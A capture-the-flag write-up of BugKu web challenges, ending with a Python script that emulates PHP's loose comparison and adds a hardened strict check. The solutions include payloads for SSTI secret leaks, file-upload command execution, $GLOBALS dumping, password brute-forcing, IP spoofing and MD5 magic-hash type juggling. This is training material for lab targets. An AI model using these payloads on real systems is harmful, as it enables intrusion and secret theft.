BugKu Web Challenge Notes 1

References:

BugKu-Web-wp1

BugKu-Web-wp2

BugKu-Web-wp3

Flask SSTI template injection, from zero to getting started

Simple_SSTI_1

Press F12 and view the page source.

SSTI1.png

Enter:

http://114.67.175.224:17350/?flag={{config.SECRET_KEY}}

SSTI11.png

Simple_SSTI_2

SSTI2.png

Flask_FileUpload

Create 111.txt with the following content:

import os
os.system('cat /flag')

Rename the file to 111.jpg and upload it to get the flag.

flaskfileupload.png

滑稽 (Huaji)

huaji1.png

Press F12, then Ctrl+F and search for "flag".

huaji.png

计算器 (Calculator)

Press F12, change the length limit on the input field, then enter the correct result of the calculation.

jisuanqi.png

GET

GET.png

POST

POST.png

矛盾 (Contradiction)

The first condition requires the input not to be numeric; the second uses a == comparison. When a string is loosely compared with an integer, it is first converted to an integer, so '1admin' becomes 1 during the comparison. (This is PHP 7 behaviour; PHP 8 changed string-to-number comparison so that 1 == '1admin' is false.)

maodun.png

alert

View the page source.

alert1.png

Put the encoded text into an HTML file and render it to reveal the flag.

alert2.png

你必须让他停下 (You Must Make It Stop)

Capture the request with Burp Suite.

pleasestop.png

变量1 (Variable 1)

The key is this line:

eval("var_dump($$args);"); // $$args is a variable variable: it dumps the variable whose name is the value of $args

So pass args=GLOBALS; the script then dumps $GLOBALS, and the flag is among its entries.

var1.png

头等舱 (First Class)

Capture the traffic and inspect the response.

head.png

网站被黑 (Website Hacked)

The hint asks whether there is a backdoor; a scan with 御剑 (Yujian) finds shell.php.

webhack1.png

Opening it, a password is required.

webhack2.png

Brute-force the password with Burp.

webhack3.png

Enter the password to get the flag.

webhack4.png

本地管理员 (Local Administrator)

Press F12; an encoded string is visible in the source.

localadmin1.png

Base64-decode it to get the password; since the account is the administrator, guess that the username is admin.

localadmin2.png

After submitting, the response says the IP is banned.

localadmin3.png

Use Burp to spoof the client IP with a request header and get the flag:

X-FORWARDED-FOR:127.0.0.1

localadmin4.png

源代码 (Source Code)

Press F12 to get the code.

sourcecode1.png

Decode it with the following code:

var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
// unescape() reverses the %xx encoding; the page splices '%35%34%61%61%32' between the two halves,
// and the decoded checkSubmit() function contains the expected password in clear text
console.log(unescape(p1) + unescape('%35%34%61%61%32' + p2))

sourcecode2.png

Enter the password to get the flag.

sourcecode3.png

bp

From the hint (z?????), guess a six-character password starting with z and brute-force it with Burp (mark the string code: 'bugku10000' in the response matching, otherwise every returned field looks the same).

bp.png

备份是个好习惯 (Backup Is a Good Habit)

Scan with a source-leak scanner (SourceLeakHacker).

beifen1.png

Append /index.php.bak to the URL to download the source file index.php.bak:

<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
 */

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?'); // strstr: the part of the URI from '?' onward (including the '?')
$str = substr($str, 1);                      // substr: drop the leading '?'
$str = str_replace('key', '', $str);         // remove every occurrence of 'key' from $str
parse_str($str);                             // parse the query string into variables ($key1, $key2)
echo md5($key1);

echo md5($key2);
if (md5($key1) == md5($key2) && $key1 !== $key2) { // the md5 values of key1 and key2 are equal (loose ==) but the two values are not identical
    echo $flag."取得flag";
}
?>

Construct the payload:

http://114.67.175.224:11514/?kekeyy1=QNKCDZO&kekeyy2=240610708

Get the flag.

beifen2.png

Here is a batch of strings whose MD5 digest starts with 0e:

QNKCDZO        0e830400451993494058024219903391
s878926199a    0e545993274517709034328855841020
s155964671a    0e342768416822451524974117254469
s214587387a    0e848240448830537924465865611904
s1091221200a   0e940624217856561557816327384675
s1885207154a   0e50936721341820670084200876351
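As an added example (not code from the writeup or the challenge), the Python below re-implements the check from index.php.bak and emulates PHP 7's loose comparison, so the kekeyy1/kekeyy2 payload, the 0e strings listed above and the '1admin' == 1 case from the 矛盾 challenge can be verified offline; it also shows the strict-comparison variant that closes the hole. The function names and the two regular expressions are my own assumptions about how to model PHP's rules.

```python
import hashlib
import re
from urllib.parse import parse_qsl

# PHP <= 7.x calls a string "numeric" when it is an optionally signed decimal with an
# optional exponent, so an md5 digest like "0e8304..." parses as 0 * 10**8304... == 0.0.
NUMERIC_STR = re.compile(r"^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?$")
LEADING_INT = re.compile(r"^\s*[+-]?\d+")

def php_loose_eq(a: str, b: str) -> bool:
    """PHP 5/7 '==' between two strings: numeric-looking operands compare as numbers."""
    if NUMERIC_STR.match(a) and NUMERIC_STR.match(b):
        return float(a) == float(b)
    return a == b

def php7_int_eq(s: str, n: int) -> bool:
    """PHP 7 '==' between a string and an int: the string is cast to int, keeping only
    its leading digits ('1admin' -> 1, 'admin' -> 0). PHP 8 changed this rule."""
    m = LEADING_INT.match(s)
    return (int(m.group()) if m else 0) == n

def php_md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

def is_magic_md5(s: str) -> bool:
    """True when md5(s) loosely equals "0", i.e. the digest has the 0e<digits> shape."""
    return php_loose_eq(php_md5(s), "0")

def parse_challenge_query(query: str) -> tuple:
    """Mirror index.php.bak: str_replace('key', '', $str) and then parse_str($str)."""
    params = dict(parse_qsl(query.replace("key", "")))
    return params.get("key1", ""), params.get("key2", "")

def vulnerable_check(query: str) -> bool:
    """md5($key1) == md5($key2) && $key1 !== $key2, exactly as the backup file does it."""
    key1, key2 = parse_challenge_query(query)
    return php_loose_eq(php_md5(key1), php_md5(key2)) and key1 != key2

def hardened_check(query: str) -> bool:
    """Same condition with a strict digest comparison (=== / hash_equals): two different
    0e digests are no longer equal, so a real md5 collision would be needed."""
    key1, key2 = parse_challenge_query(query)
    return php_md5(key1) == php_md5(key2) and key1 != key2

if __name__ == "__main__":
    payload = "kekeyy1=QNKCDZO&kekeyy2=240610708"  # the writeup's payload; stripping 'key' yields key1/key2
    print(parse_challenge_query(payload))
    print(vulnerable_check(payload), hardened_check(payload))  # True False
    print(php7_int_eq("1admin", 1))  # True
```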